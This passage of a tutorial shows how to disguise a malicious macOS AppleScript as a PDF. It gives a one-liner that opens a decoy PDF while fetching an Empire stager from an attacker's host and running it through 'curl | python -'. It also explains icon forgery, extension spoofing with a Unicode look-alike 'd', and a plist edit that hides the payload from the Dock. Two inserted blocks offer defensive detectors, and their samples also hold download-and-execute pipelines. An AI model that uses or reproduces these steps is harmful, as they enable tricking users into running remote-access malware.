With the macOS stager created and the attacker's system hosting the Empire listener, the malicious AppleScript can be built with some Unicode and icon manipulation tricks and disguised as a legitimate PDF.
This requires a real PDF to work with. Files larger than 1 MB may be too large and may make the target suspicious. The real PDF is downloaded each time the target opens the trojanised AppleScript (the fake PDF), so the real PDF should be a single page and small enough to download quickly; otherwise the target might wonder why a PDF that should open immediately takes a few seconds to appear in Preview.
In this follow-up to the first part on creating a malicious PDF for MacBooks, I'll show you how to quickly create a fake PDF using the cover of a CompTIA study guide from AllITebooks, although a higher quality image should be used in a real scenario.
Step 1: Copy a PDF Cover Image
Navigate in your web browser to the site hosting the PDF you want to clone. In my example, this is the CompTIA study guide on AllITebooks. You do not actually need to download the PDF; you only need the first-page image shown in the preview, so right-click on it, choose "Save Image As", and save it as cover.jpg in the files/ directory.
Step 2: Install GIMP and open the image
To manipulate the PDF cover image, we need GIMP, a popular image editing application that is completely free. To install it, use the apt-get command below.
apt-get install gimp
Once installed, open cover.jpg in GIMP with the following command.
Step 3: Export the cover sheet as PDF
Next, export the image to the files/ directory by navigating to "File" and then "Export As". Change the file name to real.pdf and the file type to "Portable Document Format (*.pdf)".
Apple icons must be perfectly symmetrical squares, and cover.jpg is rectangular. To fix this, navigate to the "Image" menu in GIMP and then to "Canvas Size".
Set the Width to match the Height and click "Resize" to save the changes. The new canvas shows a lot of transparent space on the right side of the picture. To center the image, use the Align tool under "Tools", then "Transform Tools".
Left-click once on the image to select it, and then click the Center button. Note that the transparent area is now on both sides of the cover photo, as shown below.
Now resize the image by navigating to "Image", then "Scale Image", and change the Width and Height to 256.
Export the image again to the files/ directory by navigating to "File", then "Export As". Change the file name to cover.png and the file type to "PNG Image (*.png)".
The final step for the images is to convert cover.png into the Apple ICNS icon file format. To do this, upload the cover.png file to CloudConvert and click the "Start conversion" button.
When the conversion is done, download the .icns file and save it in the files/ directory. There should now be four files in the files/ directory (you can verify this with ls).
tokyoneon ~/files > ls
cover.icns  cover.jpg  cover.png  real.pdf
The cover.jpg and cover.png were used as templates and are no longer needed. The real.pdf is a small PDF that the target downloads each time the AppleScript (the fake PDF) is opened. The cover.icns is the Apple icon file used in a later step.
That's it for the Kali Linux side. To make the malicious AppleScript (fake PDF), I use the Script Editor in macOS High Sierra.
Step 8: Create the AppleScript
It should be possible to create trojanized AppleScripts with Kali, but it is a bit more involved than this article allows. To keep things simple, I use macOS with AppleScript version 2.7 and Script Editor version 2.10. If readers want a full Kali Linux method, please leave a comment and I'll see what I can do.
First, copy the real PDF being cloned to the macOS desktop. This allows the attacker to make a direct comparison when creating the forged PDF.
Then open Apple's built-in Script Editor (search for it with Spotlight, or find it in Launchpad or in the Utilities folder under Applications) and copy the following script into the window. This is the single-line AppleScript that runs on the victim's MacBook when the fake PDF is double-clicked.
do shell script "s=ATTACKER-IP-ADDRESS:PORT; curl -s $s/real.pdf | open -f -a Preview.app & curl -s $s/script | python -"
- The start of the script (do shell script) is the AppleScript directing the MacBook to execute the shell code that follows.
- The attacker's server is set as a variable (s=ATTACKER-IP-ADDRESS:PORT) and should be changed to the attacker's local IP address, for example s=18.104.22.168:8080.
- The real PDF is downloaded (curl -s $s/real.pdf) from the attacker's server, piped (|) and opened (open -f -a Preview.app) with the macOS Preview application.
- Lastly, the Empire stager, stored as "script" on the attacker's server, is downloaded (& curl -s $s/script | python -) and executed with Python on the victim's MacBook.
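From a detection standpoint, the one-liner above is a textbook download-and-execute pipeline: a downloader writing to stdout, piped straight into an interpreter that reads its program from stdin, with output silenced. The following is an added example, not part of the original article, showing how a defender can flag that pattern in process command-line telemetry. The sample command lines are constructed (including a copy of the article's own pipeline with a placeholder address); the `sh -c` wrapper is assumed to have been stripped by whatever tool recorded them.

```python
import os
import re
import shlex
from dataclasses import dataclass

DOWNLOADERS = {"curl", "wget"}
# Interpreters that will run whatever arrives on stdin when given "-" or no script argument.
STDIN_INTERPRETERS = {"python", "python2", "python3", "perl", "ruby", "sh", "bash", "zsh", "osascript"}

# Constructed sample command lines, as an analyst might pull them from EDR or `ps` output.
SAMPLE_COMMAND_LINES = [
    "s=192.0.2.10:8080; curl -s $s/real.pdf | open -f -a Preview.app & curl -s $s/script | python -",
    "curl -s https://example.invalid/installer.sh | sh",
    "curl -o report.pdf https://example.invalid/report.pdf",
    "python3 analysis.py --input data.csv",
    "wget -qO- http://203.0.113.5/x | bash",
]


@dataclass
class Finding:
    downloader: str
    source: str        # last positional argument of the downloader: a URL or, as here, a shell variable
    interpreter: str
    silent: bool       # downloader was told to suppress progress output (curl -s / wget -q)


def _tokens(stage):
    """Tokenise one pipeline stage, dropping leading sudo and VAR=value assignments."""
    try:
        toks = shlex.split(stage)
    except ValueError:          # unbalanced quotes: fall back to whitespace split
        toks = stage.split()
    while toks and (toks[0] == "sudo" or re.fullmatch(r"[A-Za-z_]\w*=.*", toks[0])):
        toks.pop(0)
    return toks


def _writes_to_stdout(toks):
    """True if the downloader sends the fetched body to stdout rather than a file."""
    name = os.path.basename(toks[0])
    if name == "curl":
        return not any(t in ("-o", "-O", "--output", "--remote-name") or t.startswith("--output=")
                       for t in toks[1:])
    if name == "wget":
        joined = " ".join(toks[1:])
        return bool(re.search(r"(?:^|\s)(?:-\w*O\s*-|--output-document(?:=|\s+)-)(?:\s|$)", joined))
    return False


def _reads_stdin(toks):
    """True if the interpreter has no script file argument (only flags and/or a lone '-')."""
    positionals = [t for t in toks[1:] if not t.startswith("-") or t == "-"]
    return all(p == "-" for p in positionals)


def _is_silent(toks):
    flag = "s" if os.path.basename(toks[0]) == "curl" else "q"
    return any(t in ("--silent", "--quiet") or re.fullmatch(rf"-[A-Za-z]*{flag}[A-Za-z-]*", t)
               for t in toks[1:])


def find_download_exec(cmdline):
    """Return a Finding for every 'downloader | interpreter' pair in the command line."""
    # Split on shell separators but keep them, so we know which boundaries are pipes.
    # (Redirections such as 2>&1 are not handled by this simple splitter.)
    parts = re.split(r"\s*(\|\||&&|[|;&])\s*", cmdline)
    stages, seps = parts[0::2], parts[1::2]
    findings = []
    for i, sep in enumerate(seps):
        if sep != "|":
            continue
        left, right = _tokens(stages[i]), _tokens(stages[i + 1])
        if not left or not right:
            continue
        dl, interp = os.path.basename(left[0]), os.path.basename(right[0])
        if dl in DOWNLOADERS and _writes_to_stdout(left) and interp in STDIN_INTERPRETERS and _reads_stdin(right):
            positionals = [t for t in left[1:] if not t.startswith("-")]
            findings.append(Finding(dl, positionals[-1] if positionals else "?", interp, _is_silent(left)))
    return findings


def scan(cmdlines):
    """Return [(cmdline, findings)] for every command line with at least one hit."""
    return [(c, f) for c in cmdlines if (f := find_download_exec(c))]


if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_COMMAND_LINES):
        for h in hits:
            print(f"{h.downloader} -> {h.interpreter} (source {h.source}, silent={h.silent}): {cmd}")
```

Note that the first sample produces exactly one hit: the `curl ... | open` stage is ignored because Preview is not an interpreter, while `curl -s $s/script | python -` is flagged with the source recorded as the unexpanded `$s/script`, which is itself a useful signal that the URL was assembled at run time.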
Next, click "File" in the menu bar, then "Export" to start saving the AppleScript.
Export it to the desktop with the filename fake, change the file format to "Application", and disable "Show startup screen".
Functionally speaking, the fake PDF behaves as intended. But if you look at the two files side by side now, there is still a lot to do to make it look like the real PDF on the left.
As seen in the GIF above, for real .pdf files macOS generally uses the first page of the PDF to generate the file icon. This can of course easily be faked with the previously created .icns file. To change the icon, move the cover.icns file from the Kali system to the MacBook, right-click the fake file, and choose "Get Info".
Then drag the cover.icns file onto the icon in the fake file's Info window to change it.
The AppleScript now looks more like the real PDF. With a little patience, the crease in the top right corner of the icon, the outline of the icon, and the binder rings can be easily reproduced with GIMP and other photo editor tricks. The details of further spoofing the cover photo are a bit boring, so I'll move on; you get the idea.
The bigger problem is the filename. Ideally, the AppleScript would carry a PDF file extension. But changing the file extension to .pdf causes macOS to display the AppleScript's true file extension.
As shown above, macOS automatically appends the .app extension. One way to get a convincing file extension is to use Unicode, a character encoding standard that provides a unique number for each character.
Unicode U+1E0B is the Latin small letter d with a dot above, and at a glance it looks just like a normal "d" character.
Copying this character from the Wikipedia page and pasting it into the AppleScript filename produces a much more convincing file extension.
At a glance, the difference could easily be mistaken for a speck of dust. On closer examination, the difference in the Latin "d" can be seen more clearly.
This is just one of many available Unicode characters used for such extension spoofing attacks and other types
Step 11: Hide the Python script from the dock
Another problem with using AppleScripts this way is that, after the script runs, the Dock shows two new items.
One icon is Preview displaying the real PDF; the other represents the malicious Python script executed in the background. To fix this, right-click the fake.pdf file and choose "Show Package Contents".
Navigate to the "Contents" directory and open the "Info.plist" file in TextEdit. Add the following NSUIElement text to the Info.plist file.
This is how it should look in TextEdit:
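Each trick in this part leaves an inspectable artifact on disk: the bundle is really a directory ending in .app, the spoofed extension contains a non-ASCII character that folds to an ASCII letter, a Script Editor applet keeps its compiled script under Contents/Resources/Scripts/main.scpt, the Info.plist carries an NSUIElement/LSUIElement key, and an icon dropped onto Get Info is stored by Finder as a file literally named "Icon\r" inside the bundle. The following added example, not part of the original article, builds a constructed bundle laid out as described here beside a benign one and scans both for those indicators, covering both the Unicode extension spoofing and the Dock-hiding plist edit. The bundle names, plist contents and directory layout are assumptions for the demonstration; the script contents are empty placeholders.

```python
import plistlib
import tempfile
import unicodedata
from pathlib import Path

DOCUMENT_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "jpg", "png", "zip"}
# Keys that keep a running app out of the Dock and the app switcher.
HIDE_UI_KEYS = ("LSUIElement", "NSUIElement", "LSBackgroundOnly")


def homoglyph_folded(name):
    """Return (ascii_approximation, had_non_ascii).

    NFKD decomposes U+1E0B into 'd' + U+0307 (combining dot above); dropping
    combining marks yields the plain 'd', so 'fake.pḋf' folds to 'fake.pdf'.
    """
    decomposed = unicodedata.normalize("NFKD", name)
    folded = "".join(ch for ch in decomposed if not unicodedata.combining(ch))
    return folded, any(ord(ch) > 127 for ch in name)


def inspect_bundle(bundle):
    """Return human-readable findings for one .app bundle (empty list = nothing suspicious)."""
    bundle = Path(bundle)
    findings = []

    # 1. Name checks: strip the .app suffix Finder hides, fold homoglyphs, look for a document extension.
    stem = bundle.name[:-4] if bundle.name.endswith(".app") else bundle.name
    folded, has_non_ascii = homoglyph_folded(stem)
    if has_non_ascii and folded != stem:
        findings.append(f"non-ASCII characters in name; folds to '{folded}'")
    inner_ext = folded.rsplit(".", 1)[-1].lower() if "." in folded else ""
    if inner_ext in DOCUMENT_EXTENSIONS:
        findings.append(f"app bundle named to look like a .{inner_ext} document")

    # 2. Info.plist keys that hide the running app from the Dock.
    plist_path = bundle / "Contents" / "Info.plist"
    if plist_path.is_file():
        with plist_path.open("rb") as fh:
            info = plistlib.load(fh)
        for key in HIDE_UI_KEYS:
            if str(info.get(key, "")).lower() in ("1", "true", "yes"):
                findings.append(f"Info.plist {key} hides the running app from the Dock")

    # 3. Applets exported from Script Editor keep the compiled script here.
    if (bundle / "Contents" / "Resources" / "Scripts" / "main.scpt").is_file():
        findings.append("AppleScript applet (Contents/Resources/Scripts/main.scpt present)")

    # 4. Finder stores an icon applied through Get Info in a file named 'Icon' + carriage return.
    if (bundle / "Icon\r").exists():
        findings.append("custom Finder icon applied via Get Info")
    return findings


def scan_directory(root):
    """Inspect every .app bundle directly under root; returns {bundle name: findings}."""
    return {p.name: inspect_bundle(p) for p in sorted(Path(root).iterdir()) if p.is_dir() and p.suffix == ".app"}


def build_sample_bundle(root):
    """Constructed bundle mimicking the article's layout: spoofed 'pḋf' extension, hidden UI, applet script."""
    bundle = Path(root) / ("fake.p" + "\u1e0b" + "f.app")
    scripts = bundle / "Contents" / "Resources" / "Scripts"
    scripts.mkdir(parents=True)
    (scripts / "main.scpt").write_bytes(b"")            # empty placeholder, not a real compiled script
    (bundle / "Icon\r").write_bytes(b"")                 # empty placeholder for Finder's custom-icon file
    with (bundle / "Contents" / "Info.plist").open("wb") as fh:
        plistlib.dump({"CFBundleExecutable": "applet", "NSUIElement": "1"}, fh)
    return bundle


def build_benign_bundle(root):
    """Constructed control bundle with an ordinary name and no hiding keys."""
    bundle = Path(root) / "Notes.app"
    (bundle / "Contents").mkdir(parents=True)
    with (bundle / "Contents" / "Info.plist").open("wb") as fh:
        plistlib.dump({"CFBundleExecutable": "Notes"}, fh)
    return bundle


def demo():
    """Build both constructed bundles in a temporary directory and return the scan results."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_bundle(root)
        build_benign_bundle(root)
        return scan_directory(root)


if __name__ == "__main__":
    for name, hits in demo().items():
        print(name, "->", hits or "clean")
```

Run against a user's Downloads or Desktop folder, `scan_directory` gives a quick triage list; the name check alone catches any app bundle whose visible name ends in a document extension, with or without the Unicode substitution.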